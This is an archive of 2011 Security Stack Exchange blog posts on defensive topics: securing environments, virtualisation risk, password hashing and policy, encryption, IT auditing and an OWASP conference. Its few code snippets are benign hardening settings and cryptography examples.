QotW #14: How to secure an environment both physically and technically?

2011-12-16

So after a slight hiatus we are back running question of the week posts again. This time, chosen by me because we had a tie, is the question asked by user jwegner: How to secure an environment both physically and technically?

An interesting question for anyone working in an environment that processes personal data and cannot afford a data leak. As a very quick summary, jwegner had:

  • no local storage
  • CCTV cameras
  • biometric locks and key-card locks
  • SFTP to transfer data in and out when necessary.

However, jwegner was still concerned about a number of issues, including mobile phones, preventing data release when the rules need to be relaxed, and the fact that their external gateway ran both an SFTP server and an FTP server.

Security.se responded, and Jeff Ferland has the highest-voted answer. He recommended not allowing any mobile phones inside the secure area at all, since even in offline mode many phones have data ports and cameras, and he considered an internet connection for the “red” zone a no-go. However, on the subject of achieving no local storage with flash drives, Jeff recommended the opposite, citing loss of the drives as a big potential risk factor. He went on to recommend monitoring USB ports as a necessary precaution, and possibly filling them with epoxy – though his answer also notes that many devices, including keyboards and mice, are now highly reliant on the USB interface.

On the FTP gateway, Jeff recommended looking into access control to ensure internal accounts only had read access, and possibly using ProFTPd instead of the standard sftp subsystem. Finally, Jeff added an extra detail – using Deep Freeze to ensure machine configuration cannot persist across reboots.
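
For the read-only access part, here is a minimal sketch of one way to do it with OpenSSH’s built-in internal-sftp (the group name and chroot path are made-up examples; ProFTPd offers equivalent directives):

    # Illustrative sshd_config fragment -- group name and paths are assumptions
    Match Group internal-users
        ChrootDirectory /srv/sftp/%u     # jail each internal account in its own tree
        ForceCommand internal-sftp -R    # -R serves the whole session read-only
        AllowTcpForwarding no
        X11Forwarding no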

Rory Alsop echoed many of these sentiments in his answer. Going beyond Jeff’s points, Rory recommended banning mobiles with very strict consequences for their use inside the secure area as a deterrent – as well as enforcing searches on entry and exit. In addition, he recommended not using FTP at all. Rory also echoed Jeff’s Deep Freeze suggestion, recommending read-only file systems. Finally, his answer mentioned two key points:

  • Internal risks of using FTP – it may be worth moving over to SFTP so that internal traffic is harder to sniff.
  • Staff vetting.

From the comments, an interesting point was raised – blocking cellphones is illegal in the US and may be in other jurisdictions, so whilst detection methods could be used for enforcement, outright blocking may require an in-depth review of options before proceeding.

So far, these are the only two answers. Our questions of the week aim to highlight potentially interesting questions from the community; if you think you can help answer this one, the link you need is here.

Filed under Uncategorized

Some security implications of virtualisation

2011-12-07

I prepared this presentation for an ISACA event and realised it is applicable to a much wider audience:

The business benefits of virtualisation are fantastic in terms of cost savings, agility in delivering services and business resiliency. It enables organisations to spend less on hardware assets and use their existing hardware more efficiently by running multiple machines on a single piece of server hardware without significant degradation in performance. Industry and vendor studies indicate up to 50% savings in IT expenditure.

An organisation can also run just the number of servers they need at any time, with demand-led increases possible at short notice simply by enabling a new virtual machine. This is a further driver for virtualisation today, as data centre power costs are significant to any large organisation, and a reduction in the number of servers needing power and cooling offers a direct saving in bottom line costs. Studies indicate savings in energy costs through server virtualisation can reach 75% for a typical mid-sized organisation.

What are the risks?

Segregation of systems and data

Security around the standard organisational architecture is quite well understood, with acceptance that there are layers of security based on risk or impact levels, or around the value placed on particular assets – a key end result being separation: keep unauthorised individuals out, restrict an individual’s access to that which they need to do their job and host data of differing sensitivity on networks with different levels of protection.

Virtualisation can break this model – imagine your HR database and customer database virtualised onto the same environment as your web servers. All of a sudden the data which was once hidden behind layers of firewalls and network controls may be vulnerable to a smart attacker who gains access to the web server and finds an exploitable vulnerability in the virtualisation layer.

The same is true for servers hosted for customers – in the past, good practice kept these separate where possible. Now the segregation between different customers may be no more than between adjacent areas of memory or hard disk. This may not be appropriate for environments with differing risk, threat or impact ratings, for example external web servers and internal databases.

This also means that all servers and applications in the same environment should be secured to the same level, so patch management becomes very important.

Segregation of duties

Consolidation of systems also introduces a risk of losing segregation of duties (SOD). It increases the risk that both system administrators and users could potentially (and unintentionally) gain access to data above their normal privilege levels. Administration of the internal virtual switch is also a concern: it introduces a conflict between server administrators and network administrators, potentially compromising the SOD between the two groups.

Licensing and asset management

The ability to rapidly deploy new virtual infrastructure at short notice raises challenges around licensing. Virtualising applications and servers is often implemented by copying an instance of a server, and this instance is recreated on the virtual host. When further capacity is required, new instances are created, but as these can be very time-dependent, the licensing model has to be updated to ensure that an organisation only runs applications they own a licence for (or that don’t require a licence in a virtual environment).

This applies also to inventory – a virtual server is just as much of an asset to the business as a physical server, but with the number of virtual servers fluctuating with demand, how do you manage your assets appropriately?

Resilience

Although virtualisation can improve resiliency, there is also a risk if implementation is flawed.  If several key services are hosted within the same physical device in a single virtual environment then failure of the hardware device would impact several services simultaneously.

When consolidating servers, consideration should be given to distributing business critical applications with high availability requirements across physical server instances. There should be no single point of failure for a service and the use of anti-affinity rules should be considered to ensure resilient virtual machines within a service are kept on separate infrastructure hosts.

Maturity of tools and security awareness

While some virtual environments (such as the IBM LPAR architecture on mainframes) are considered mature, there is now a range of products in this space which have not been through the same level of development and which run on platforms less suited to segregating multiple users. And while there has been large-scale development of PaaS platforms based on Xen, VMware and others, treating these as secure by default may not be appropriate for your business.

Another major risk around security awareness is that virtualisation is moving forward in some organisations without the knowledge or active participation of Information Security.

Administrators need to look at the particular security requirements prior to building a virtual environment in order to use the correct tools and security configuration to support the business requirements in an appropriate manner.

Information Security involvement is critical at these early planning and architecture decision stages.

Communication and Storage Security

Sensitive data being transmitted across networks should be encrypted where possible and supported by the hypervisor. Encryption should be implemented for traffic between the hypervisor, management networks and remote client sessions and MUST be for virtualised DMZ environments.

Virtual disks are used to store the operating system, applications and data and also record the state of the virtual machine. Virtual disks (including backed up copies) must be protected from unauthorised modification.

Where virtual disk password protection features exist, they should be enabled.

Restrict disk shrinking features, which allow non-privileged users and processes to reclaim unused virtual disk space, as this may cause denial of service to legitimate users and processes.
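
On VMware platforms, for example, hardening guidance exposes this as per-VM configuration parameters along these lines (a sketch only – confirm the exact parameter names against your hypervisor’s current hardening guide):

    # Illustrative .vmx settings based on VMware hardening guidance; verify for your version
    isolation.tools.diskShrink.disable = "TRUE"    # block guest-initiated disk shrinking
    isolation.tools.diskWiper.disable = "TRUE"     # block the related disk wiper operation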

Auditing, logging and monitoring

Enable security logging and monitoring on all virtual machines and hypervisors according to approved operational standards.

Hypervisors must be configured, at a minimum, to log failed and successful login attempts to management interfaces.

Activities of privileged hypervisor and VM accounts (for example, the creation, modification and deletion of roles) must be logged and reviewed.

Summary

  • Understand all the key IT controls in the existing environment before virtualisation
  • Understand virtual platform controls and configure for security
  • Replicate IT controls in the virtualised environment
  • Implement an asset management system which can cope with high volatility
  • Work with software and hardware vendors to understand licensing implications
  • If outsourcing to a cloud vendor, choose one that can match your data location requirements and build in a robust reporting framework
  • Rearrange your support teams to suit the new environment, but during the transition it is likely that the learning curve will be steep as new tools are used, and back office and front office support teams are created anew
  • Use a compliance and governance model which can manage the concepts of changing security boundaries and levels
  • Ideally work with a service provider who has done it before!

Filed under Risk, Virtualisation

QotW #13: Standards for server security, besides PCI-DSS?

2011-11-11

This week’s Question of the Week was asked by nealmcb in response to the ever-wider list of standards which apply in different industries. The Financial Services industry has a well-defined set of standards, including the Payment Card Industry Data Security Standard (PCI-DSS), which focuses specifically on credit card data and primary account numbers, but neal’s core question is this:

Are there standards and related server certifications that are more suitable for e.g. web sites that hold a variety of sensitive personal information that is not financial (e.g. social networking sites), or government or military sites, or sites that run private or public elections?

This question hasn’t inspired a large number of answers, which is surprising, as complying with security standards is becoming an ever more important part of running a business.

The answers which have been provided are useful, however, with links to standards provided by the following:

From Gabe:

Of these, the CIS standards are being used more and more in industry as they provide a simple baseline which should be altered to fit circumstances but is a relatively good starting point out of the box.

Jeff Ferland provided a longer list:

And as I tend to be pretty heavily involved with the ISF, I included a link to the Standard of Good Practice which is publicly available and is exactly what it sounds like: rational good practice in security.

From all these (and many more) it can be seen that there is a wide range of standards, each with a different focus on security – which supports this.josh’s comment:

As is often noted in questions and answers on this site, the solution depends on what you are protecting and who you are protecting it from. Even similar industries under different jurisdictions may need different protections. Thus I think it makes sense for specific industries and organizations to produce their own standards.

A quick look at questions tagged Compliance shows discussion on Data Protection Act, HIPAA, FDA, SEC guidelines, RBI and more.

If you are in charge of IT or Information Security, Audit or Risk, it is essential that you know which standards are appropriate to you, which ones are mandatory, which are optional, which may be required by a business partner etc., and to be honest it can be a bit of a minefield.

The good thing is – this is one of the areas where the Stack Exchange model works really well. If you ask the question “Is this setup PCI compliant?” there are enough practitioners, QSAs and experienced individuals on the site that an answer should be very straightforward. Of course, you would still need a QSA to accredit, but as a step towards understanding what you need to do, Security.StackExchange.com proves its worth.

Filed under Standards

Why passwords should be hashed

2011-11-01

How passwords should be hashed before storage or usage is a very common question, always triggering passionate debate. There is a simple and comprehensive answer (use bcrypt, but PBKDF2 is not bad either) which is not the end of the question since theoretically better solutions have been proposed and will be worth considering once they have withstood the test of time (i.e. “5 to 10 years in the field, and not broken yet”).

The less commonly asked question is:

why should a password be hashed?

This is what this post is about.

Encryption and Hashing

A first thing to note is that there are many people who talk about encrypted passwords but really mean hashed passwords. An encrypted password is like anything else which has been encrypted: it has been rendered unreadable through a process which used an extra piece of secret data (the key) and which can be reversed with knowledge of the same key (or of a distinct, mathematically related key, in the case of asymmetric encryption). For password hashing, on the other hand, there is no key. The hashing process is like a meat grinder: anybody can operate it, but there is no way to get your cow back in full moo-ing state – whereas encryption would be akin to locking the cow in a stable. Cryptographic hash functions are functions which anybody can compute, efficiently, over arbitrary inputs. They are deterministic (same input yields same output, for everybody).

In shorter words: if MD5 or SHA-1 is involved, this is password hashing, not password encryption. Let’s use the correct term.

Once hashed, the password is still quite useful, because even though the hashing process is not reversible, the output still contains the “essence” of the hashed password, and two distinct passwords will yield, with very high probability (i.e. always, in practice), two distinct hashed values (that’s because we are talking about cryptographic hash functions, not the other kind). And the hash function is deterministic, so you can always rehash a putative password and see if the result is equal to a given hash value. Thus, a hashed password is sufficient to verify whether a given password is correct or not.
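
As a minimal illustration of that verification step (plain SHA-256 is used here only to show determinism; as discussed below, a real password store should use a salted, slow function such as bcrypt):

    import hashlib

    def hash_password(password: str) -> str:
        # Deterministic: the same input always yields the same digest.
        return hashlib.sha256(password.encode("utf-8")).hexdigest()

    stored = hash_password("correct horse battery staple")

    # Verification: rehash the candidate and compare with the stored value.
    print(hash_password("correct horse battery staple") == stored)  # True
    print(hash_password("Tr0ub4dor&3") == stored)                   # False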

This still does not tell us why we would hash a password, only that hashing a password does not forfeit the intended usage of authenticating users.

To Hash or Not To Hash?

Consider the following scenario: you have a Web site, with users who can “sign in” by showing their name and password. Once signed in, users gain “extra powers” such as reading and writing data. The server must then store “something” which can be used to verify user passwords. The most basic “something” consists of the passwords themselves. Presumably, the passwords would be stored in a SQL database, probably along with whatever data is used by the application.

The bad thing about such “cleartext” storage of passwords is that it induces a vulnerability in the case of an attack model where the attacker could get read-only access to the server data. If that data includes the user passwords, then the villain could use these passwords to sign in as any user and get the corresponding powers, including any write access that valid users may have. This is an edge case (the attacker can read the database but not write to it). However, this is a realistic edge case. Unwanted read access to parts of a Web server database is a common consequence of an SQL injection vulnerability. This really happens.

Also, the passwords themselves can be a prized spoil of war: users are human beings, they tend to reuse passwords across several systems. Or, on the more trivial aspect of things, many users choose as password the name of their girlfriend/boyfriend/dog. So knowing the password for a user on a given site has a tactical value which extends beyond that specific site, and even having an accidental look at the passwords can be embarrassing and awkward for the most honest system administrator.

Storing only hashed passwords solves these problems as best as one can hope for. It is unavoidable that a complete dump of the server data yields enough information to “try” passwords (that’s an “offline dictionary attack”) because the dump allows the attacker to “simulate” the complete server on his own machines, and try passwords at his leisure. We just want to make sure that the attacker has no faster strategy. A hash function is the right tool for that. In full detail, the hashing process should include a per-password random salt (stored along with the hashed value) and be appropriately slow (through thousands or millions of nested iterations), but that’s not the subject of this post. Just use bcrypt.
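
A minimal sketch of that advice using the common Python bcrypt package (the cost factor shown is just an illustrative default):

    import bcrypt

    password = b"correct horse battery staple"

    # gensalt() produces a per-password random salt; the cost factor (rounds)
    # controls how slow each hash computation is.
    hashed = bcrypt.hashpw(password, bcrypt.gensalt(rounds=12))

    # Later, at login time: checkpw rehashes the candidate with the stored salt.
    assert bcrypt.checkpw(b"correct horse battery staple", hashed)
    assert not bcrypt.checkpw(b"Tr0ub4dor&3", hashed)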

Summary: we hash passwords to prevent an attacker with read-only access from escalating to higher power levels. Password hashing will not make your Web site impervious to attacks; it will still be hacked. Password hashing is damage containment.

A drawback of password hashing is that since you do not store the passwords themselves (but only a piece of data which is sufficient to verify a password without being able to recover it), you cannot send back their passwords to users who have forgotten them. Instead, you must select a new random password for them, or let them choose a new password. Is that an issue? One could say that since the user forgot his old password, then that password was not easy to remember, so changing it is not a bad thing after all. Users are accustomed to such a procedure. It may surprise them if you are able to send them back their password. Some of them might even frown upon your lack of security savviness if you thus demonstrate that you do not hash the stored passwords.

Filed under Authentication, Crypto, Password

How long is a password string?

2011-10-18

Password policy questions are a perennial fixture of IT Security Stack Exchange, and take many forms.

Take, for example, the recent XKCD comic on the subject:

Shortly after it was posted, user Billy ONeal asked directly whether the logic was sound: Is a short complex password or a long dictionary passphrase better? You will find answers that support either conclusion, as well as answers that put the trade-offs involved into context.

Of course, part of knowing how easy a password is to crack is knowing how a password cracker works. Are there state of the art techniques or theory specifically for attacking pass phrases? Are there lists of the most common words or ngrams used in passwords and pass phrases?

So we’ve got no consistent idea about what constitutes a “good” password, although we can probably guess which weak passwords will fall first. But then who is responsible for deciding a user’s password strength? Pretend for a moment that we agree what a strong password is. Should we stop users from choosing “weak” passwords, or is it their own fault for not understanding information theory and the entropy content of their chosen string of characters?
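
As a back-of-the-envelope illustration of that entropy argument (an upper bound only – real crackers exploit the structure of human-chosen passwords, so actual strength is usually lower):

    import math

    def naive_entropy_bits(length: int, alphabet_size: int) -> float:
        # Upper-bound entropy of a truly random string: length * log2(alphabet size).
        return length * math.log2(alphabet_size)

    # 8 random characters drawn from the 94 printable ASCII symbols:
    print(round(naive_entropy_bits(8, 94), 1))     # ~52.4 bits

    # 4 words chosen at random from a 2048-word list (the XKCD-style passphrase):
    print(round(naive_entropy_bits(4, 2048), 1))   # 44.0 bits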

The definitive answer is “it depends”. It depends on how valuable the assets being protected by password access are. It depends on whether the value is appreciated by you as service provider/systems administrator, or by the user as customer/asset owner (or by a combination of those roles, or by someone else). It depends on how much inconvenience you’re willing to put your users to, and on how much inconvenience your users are willing to accept.

So, you’ve decided that you do want to enforce a policy. How does that work? Some websites enforce a maximum password length – is that a good idea? Should passwords be truly random?

To summarise the discussion this far: there are different ideas of what makes a good password, of who is responsible for deciding whether a password is good or bad, and of how to enforce good passwords once you do decide you want to. But all of this discussion has already put the cart before the horse. Are your passwords going to be brute-forced, or will the attacker use a key logger? Maybe they’ll attack the password where it’s stored?

Indeed, while we’re asking the big questions, why passwords at all? Might biometric identification be better? Why not just forget all of this complication over strong passwords and start taking fingerprints instead? Some reasons include the possibility of false positives from the biometrics system (who hasn’t tried holding up a photograph to a facial recognition system?), and the icky disgustingness of some other attacks.

Suffice it to say that the problem of password security is a complex one, but one that the denizens of security.stackexchange.com enjoy tackling.

Filed under Authentication, Password, Risk

QotW #12: How to counter the statement: “You don’t need (strong) security if you’re not doing anything illegal”?

2011-10-10

Ian C posted this interesting question, which does come up regularly in conversation with people who don’t deal with security on a daily basis, and seems to be highlighted in the media for (probably) political reasons. The argument is “surely as long as you aren’t breaking the law, you shouldn’t need to prevent us having access – just to check, you understand”

This can be a very emotive subject, and it is one that has been used and abused by various incumbent authorities to impose intrusions on the liberty of citizens, but how can we argue the case against it in a way the average citizen can understand?

Here are some viewpoints already noted – what is your take on this topic?

M’vy made this point from the perspective of a business owner:

Security is not about doing something illegal, it’s about someone else doing something illegal (that will impact you).

If you don’t encrypt your phone calls, someone could know about what all your salesman are doing and can try to steal your clients. If you don’t shred your documents, someone could use all this information to mount a social engineering attack against your firm, to steal R&D data, prototype, designs…

Graham Lee supported this with a simple example:

 Commercial confidential data…could provide competitors with an advantage in the marketplace if the confidentiality is compromised. If that’s still too abstract, then consider the personal impact of being fired for being the person who leaked the trade secrets.

So we can easily see a need for security in a commercial scenario, but why should a non-technical individual worry? From a more personal perspective, Robert David Graham pointed this out

 As the Miranda Rights say: “anything you say can and will be used against you in a court of law”. Right after the police finish giving you the Miranda rights, they then say “but if you are innocent, why don’t you talk to us?”. This leads to many people getting convicted of crimes because it is indeed used against them in a court of law. This is a great video on YouTube that explains in detail why you should never talk to cops, especially if you are innocent: http://www.youtube.com/watch?v=6wXkI4t7nuc

Tate Hansen‘s thought is to ask,

“Do you have anything valuable that you don’t want someone else to have?”

If the answer is Yes then follow up with “Are you doing anything to protect it?”

From there you can suggest ways to protect what is valuable (do threat modeling, attack modeling, etc.).

But the most popular answer by far was from Justice:

You buy a lock and lock your front door if you live in a city, in close proximity to hundreds of thousands of others. There is a reason for that. And it’s the same reason why you lock your Internet front door.

Iszi asked a very closely linked question “Why does one need a high level of privacy/anonymity for legal activities”, which also inspired a range of answers:

From Andrew Russell, these 4 thoughts go a long way to explaining the need for security and privacy:

If we don’t encrypt communication and lock systems then it would be like:

Sending letters with transparent envelopes. Living with transparent clothes, buildings and cars. Having a webcam for your bed and in your bathroom. Leaving unlocked cars, homes and bikes.

And finally, from the EFF’s privacy page:

Privacy rights are enshrined in our Constitution for a reason — a thriving democracy requires respect for individuals’ autonomy as well as anonymous speech and association. These rights must be balanced against legitimate concerns like law enforcement, but checks must be put in place to prevent abuse of government powers.

A lot of food for thought…

Filed under Business, Risk, Uncategorized

Risk Assessments: Knowing What to Protect

2011-10-04

A company’s data is as much a risk as it is an asset. The way that customer data is stored in modern times requires it to be protected as a vulnerable asset and regarded as an unrealized liability, even if not considered on the annual financial statement. In many jurisdictions this is enforced by legislation (e.g. the Data Protection Act 1998 in the UK).

One of the challenges of this as a modern concern lies in knowing where your data is.

To make a comparable example, consider a company that owns its place of operation. That asset must be protected with an investment both for sound business sense and by regulatory requirement. Fire protection, insurance, and ongoing maintenance are assumed costs that are considered all but mandatory. A company that isn’t covering those costs is probably not standing on all its legs. The loss of a primary building because of inadequate investment in protection and maintenance could be anywhere from a major event to fatal to the company.

It may seem a surreal comparison, but data exposure can have an impact as substantial as losing a primary building. A bank without customer records is dead regardless of the cash on hand. A bank with all its customer records made public is at risk of the same fate. Illegitimate transactions, damage to reputation, liability for customer losses related to disclosure and regulatory reaction may all work together to end an institution.

Consider how earlier this year Sony’s PlayStation online gaming network was hacked. In the face of this compromise Sony estimated their present losses at $171 million, suffered extended periods of service downtime, and suffered further breaches in attempting to restore service. Further losses are likely as countries around the world investigate the situation and consider fines. Private civil suits have also been brought in response to the breaches. To put the numbers in perspective, the division responsible for the PlayStation network posted a 2010 loss of approximately $1 billion.

In total (across several divisions), Sony suffered at least 16 distinct instances of data loss or unintended access including an Excel file containing sweepstakes data from 2001 that Sony posted online. No compromise was needed for that particular failure — the file was readily available and indexed by Google. In the end, proprietary source code, administrator credentials, customer birthdays, credit card information, telephone numbers and home addresses were all exposed.

Regarding Sony’s breaches, the following question was posed: “If you were called by Sony right now, had 100% control over security, what would you do in the first 24-hours?” The traditional response is isolating breaches, identifying them, restoring service with the immediate attack vectors closed, and shoring up after that. However, from the outside Sony’s issue appears to be systemic. Their systems are varied, complicated, and numerous. Weaknesses appear to be everywhere. They were challenged in returning to a functioning state because they were not compromised in an isolated way. Isolating and identifying breaches was as far as one could get in those first 24 hours. Indeed, a central part of the division’s core revenue business was out of service for roughly 3 weeks.

The root issue behind everything is likely that Sony isn’t aware of their assets. Everything grew in place organically and they didn’t know what to protect. Sony claims it encrypted its credit card data, but researchers have found card numbers related to the attack. Other identifying information wasn’t encrypted. Regardless of the circumstances related to the disclosure of credit card data, Sony failed to protect other valuable information that can make it liable for fraud. Damage to Sony’s reputation and regulatory reaction, including Japan preventing the service from restarting there at least through July, are additional issues.

The lack of awareness about what data is at risk can impact a business of any size. Much as different types of fire protection are needed to deal with an office environment, outdoor tire storage at an auto shop, a server room and a chemical factory, different types of security need to be applied to your data based on its exposure. Water won’t work on a grease fire, and encrypting a database has no value if a query can be run against it to retrieve all the information without encryption. While awareness is acute about credit card sensitivity, losing names, addresses, phone numbers and dates of birth can present just as much risk for fraud and civil or regulatory liability. This is discussed in ‘Data Categorisation – critical or not?’ and should be a key step in any organisation’s plans for resilience.

Filed under Business, Risk

QotW #11: Is it possible to have a key for encryption, that cannot be used for decryption?

2011-09-30

This week’s question of the week was asked by George Bailey, who wanted to know if it were possible to have a key for encryption that could not be used for decryption. This seems at first sight like a simple question, but underneath it there are some cryptographic truths that are interesting to look at.

Firstly, as our first answerer SteveS pointed out, the process of encrypting data according to this model is asymmetric encryption. Steve provided links to several other answers we have. First up from this list was asymmetric vs symmetric encryption. From our answers there, public key cryptography requires two keys: one that can only encrypt material and another which can decrypt it. As was observed in several answers, compared to straightforward symmetric encryption, public key cryptography carries a large additional burden and depends heavily on careful mathematics, while symmetric key encryption relies mainly on the confusion and diffusion principles outlined in Shannon’s 1949 Communication Theory of Secrecy Systems. I’ll cover some other points raised in answers later on.

A similarly excellent source of information is what are private and public key cryptography and where are they useful?

So that answered the “is it possible to have such a system” question; the next step is how. This question was asked on the SE network’s Crypto site – how does asymmetric encryption work? In brief, in the most commonly used asymmetric encryption algorithm (RSA), the core element is a trapdoor function or permutation – a process that is relatively trivial to perform in one direction, but difficult (ideally, impossible, but we’ll discuss that in a minute) to perform in reverse, except for those who own some “insider information” — knowledge of the private key being that information. For this to work, the “insider information” must not be guessable from the outside.

This leads directly into interesting territory on our original question. The next linked answer was what is the mathematical model behind the security claims of symmetric ciphers and hash algorithms. Our accepted answer there by D.W. tells you everything you need to know – essentially, there isn’t one. We only believe these functions are secure based on the fact that no vulnerability has yet been found.

The problem then becomes: are asymmetric algorithms “secure”? Let’s take RSA as an example. RSA uses a trapdoor permutation, which is raising values to some exponent (e.g. 3) modulo a big non-prime integer (the modulus). Anybody can do that (well, with a computer at least). However, the reverse operation (extracting a cube root) appears to be very hard, except if you know the factorization of the modulus, in which case it becomes easy (again, using a computer). We have no actual proof that factoring the modulus is required to compute a cube root; but more than 30 years of research have failed to come up with a better way. And we have no actual proof either that integer factorization is inherently hard; but that specific problem has been studied for at least 2500 years, so easy integer factorization is certainly not obvious. Right now, the best known factorization algorithm is the General Number Field Sieve, and its cost becomes prohibitive when the modulus grows (the current world record is for a 768-bit modulus). So it seems that RSA is secure (with a long enough modulus): breaking it would require outsmarting the best mathematicians in the field. Yet it is conceivable that a new mathematical advance may occur any day, leading to an easy (or at least easier) factorization algorithm. The basis for the security claim remains the same: smart people spent time thinking about it, and found no weakness.
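
To make the trapdoor idea concrete, here is a toy sketch using the classic textbook RSA numbers (p = 61, q = 53); real RSA uses moduli of 1024 bits and more, plus padding, so treat this purely as an illustration:

    # Toy RSA with textbook-sized numbers -- for illustration only.
    p, q = 61, 53
    n = p * q                  # modulus: 3233 (public)
    e = 17                     # public exponent (public)
    d = 2753                   # private exponent: e * d == 1 mod lcm(p-1, q-1)

    message = 65
    ciphertext = pow(message, e, n)    # anyone can do this with the public key
    print(ciphertext)                  # 2790

    recovered = pow(ciphertext, d, n)  # easy only if you know d, i.e. the factors of n
    print(recovered)                   # 65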

Cryptography offers very few algorithms with mathematically proven security (e.g. One-Time Pad), let alone practical algorithms with mathematically proven security; none of them is an asymmetric encryption algorithm. There is no proof that asymmetric encryption can really exist. But there is no proof that hash functions exist, either, and it never prevented anybody from using hash functions.

Blog promotion aficionado Jeff Ferland provided some extra detail in his answer. Specifically, Jeff addressed which cipher setup should be used for actually encrypting the data, noting that the best setup for most real-world scenarios is the combined use of asymmetric and symmetric cryptography, as occurs in PGP, for example, where a transfer key encrypts the data using symmetric encryption and that key, a much smaller piece of data, can effectively be protected by asymmetric encryption; this is often called “hybrid encryption”. The reason asymmetric encryption is not used throughout, aside from speed, is the padding requirement, as Jeff himself and this question over on Crypto.SE discuss.
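
A minimal sketch of that hybrid pattern using the Python cryptography package (key sizes and names are illustrative, not a hardened implementation):

    from cryptography.fernet import Fernet
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import rsa, padding

    # Recipient's key pair (the public half can be shared freely).
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    public_key = private_key.public_key()

    # Bulk data is encrypted with a fresh symmetric key...
    session_key = Fernet.generate_key()
    ciphertext = Fernet(session_key).encrypt(b"a large message goes here")

    # ...and only the small session key is wrapped with the asymmetric key.
    oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                        algorithm=hashes.SHA256(), label=None)
    wrapped_key = public_key.encrypt(session_key, oaep)

    # The recipient reverses the process with the private key.
    recovered_key = private_key.decrypt(wrapped_key, oaep)
    plaintext = Fernet(recovered_key).decrypt(ciphertext)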

So in conclusion, it is definitely possible to have a key that works only for encryption and not for decryption; it requires mathematical structure, and faith in the difficulty of inverting some of these operations. However, using asymmetric encryption correctly and effectively is one of the biggest challenges in the security field; beyond the maths, private key storage, public key distribution, and key usage without leaking confidential information through careless implementation are very difficult to get right.

Filed under Crypto, News

QotW #10: Carrying Out an IT Audit

2011-09-23

This week, a newly-minted master’s degree holder asked on our site, “[How do I go about] Carrying out a professional IT audit procedure?” That’s a really big question in one sentence. In trying to break it down into some parts we can address, let’s look at the perspectives of the people involved in an audit.

Staff at an audit client interact with auditors who ask a lot of questions from a script that is usually referred to as a work plan. Many times, they ask you to open the appropriate settings dialogs or configuration files and show them the configuration details that they are interested in. Management at an audit client will discuss which systems are in scope beforehand, and the managers for the auditors will select or create appropriate work plans.

The quality, nature, and scope of work plans vary widely, and a single audit will often involve the use of many different plans. Work plans might be written by the audit company or available from regulatory bodies, standards organizations, or software vendors. One example of a readily-available plan is the PCI DSS 2.0 standard. That plan displays both high-level overviews and mid-level configuration requirements across a broad spectrum. Low-level details would be operating system or application specific. Many audit plans related to banking applications have granular detail about core system configuration settings. Also have a look at this question about audit standards for law firms for an example from a different industry showing similarities and differences.

While some plans are regulatory-compliance related, most are best-practices focused. All plans are written with best practices in mind, and for those who are new to the world of IT security, that’s the most challenging part about them. There is no universal standard; many plans greatly overlap, but still differ. If the auditor is appropriately considering their client’s needs, they’ll almost certainly end up marking parts of plans as not applicable, or as not compliant but acceptable because of mitigating circumstances.

Another challenging point for those new to auditing is the sometimes hard-to-grasp separation between objectives and controls. An objective might be to ensure that each user authenticates to their own account. Controls listed in a work plan might include discussion about password expiry requirements to help prevent shared account passwords (among other things). Don’t get crossed up focusing on the control if the objective is met through some other means – perhaps everybody is using biometric authentication instead. There are too many instances of this in the audit world, and it’s a common mistake among newer auditors.

From a good auditor’s perspective, meeting the goals of the work plan might be considered 60% of the goal of the work. An auditor’s job isn’t complete unless they’re looking at the whole organization. Some examples: to fulfill a question about password change requirements, the auditor should ask an administrator, see the configuration and ask users about it (“When was the last time the system made you change your password?”). To review a system setting, the auditor should ask to see settings in a general manner, adding detail only as needed: “Can you show me the net effect of policies on this user’s account?” as opposed to “Start->run->rsop.msc”. Users reporting different experiences about password resets than the system configuration shows, or a system administrator who fumbles their way around for everything, won’t ever be in the work plan, but they will be a concern.

With that background in mind, here are some general steps to performing an IT audit procedure:

  • Meet with management and determine their needs. You should understand many of the possible accepted risks before you begin the engagement. For example, high-speed traders may stand to lose more money by implementing a firewall than not.
  • Select appropriate audit plans based on available resources and your own relevant work.
  • Properly review the controls with the objectives they meet in mind. Use multiple references when possible, and always try to confirm any settings directly.
  • Pay attention to the big picture. Things should “feel right.”
  • Review your findings with management and consider their thoughts on them. Many times the apparent severity of something needs to be adjusted.
  • At the end of the day, sometimes a business unit may accept the risk from a weak control, despite it looking severe to you as an auditor. That is their prerogative, as long as you have correctly articulated the risks.

The last part of that, auditors reviewing findings with client management, takes the most finesse and unexplainable skill. Does your finding really matter? How can you smooth things over and still deliver over 100 findings? At the end of the day, experience and repetition are the biggest part of delivering professional work, and that’s regardless of the kind of work.

Some further starting points for more detail can be found at http://en.wikipedia.org/wiki/Information_technology_audit_process and http://ithandbook.ffiec.gov/.

Filed under Business, Standards

OWASP Israel Conference 2011

2011-09-21

This past Thursday, OWASP Israel held their yearly regional conference, just before the larger global AppSec conference in the US. The Interdisciplinary Center Herzliya (IDC) was gracious enough to host the conference.

Sec.se was a sponsor there, and in addition provided some great swag – lanyards for the speakers, stickers, and loads of very cool t-shirts (these were gone before the first lecture even started!) Quite a few attendees popped them straight on, and I heard a lot of compliments on the logo design (thanks @Jin!!). Btw, Sec.se didn’t just sponsor the conference – they’re now full OWASP Members, so kudos to the fellows at StackExchange, Inc.! (Still leaves the issue of which OWASP project to sponsor, please share your opinion there!)

There were quite a few sponsors this year, and that enabled us (disclosure: I am a Board Member of the Israel chapter) to put on the biggest regional conference yet: with approximately 500 attendees – including both security professionals and developers – and parallel tracks totalling 14 talks, it was a definite success.

It was also a great opportunity for networking, as there were people from all sorts of companies there: security product vendors, other software companies, security consulting firms, government/military, academia… very wide and varied.

The only drawback for me was missing half the talks – and running back and forth between the rooms to catch my preferred ones 🙂

Here’s a quick rundown of the talks I was able to get into; note that most of the presentations are online at https://www.owasp.org/index.php/OWASP_Israel_2011 (and pretty much all of them are actually in English 😉 ).

Opening Words

Ofer Maor, Chapter Chairman, introduced OWASP for those that are new to it: now celebrating 10 years, OWASP is the foremost authority on application security, and provides some great resources to aid developers in creating amazing applications that are also secure. One of the main resources, among the various guides, is the OWASP Top Ten – this is “a broad consensus about what the most critical web application security flaws are.” There are also many open source security projects.

OWASP IL is celebrating its 5th year, and is currently one of the largest chapters… The OWASP IL chapter is also working on translating and updating the OWASP Top 10 into Hebrew (if this is your native language – please give a hand!)

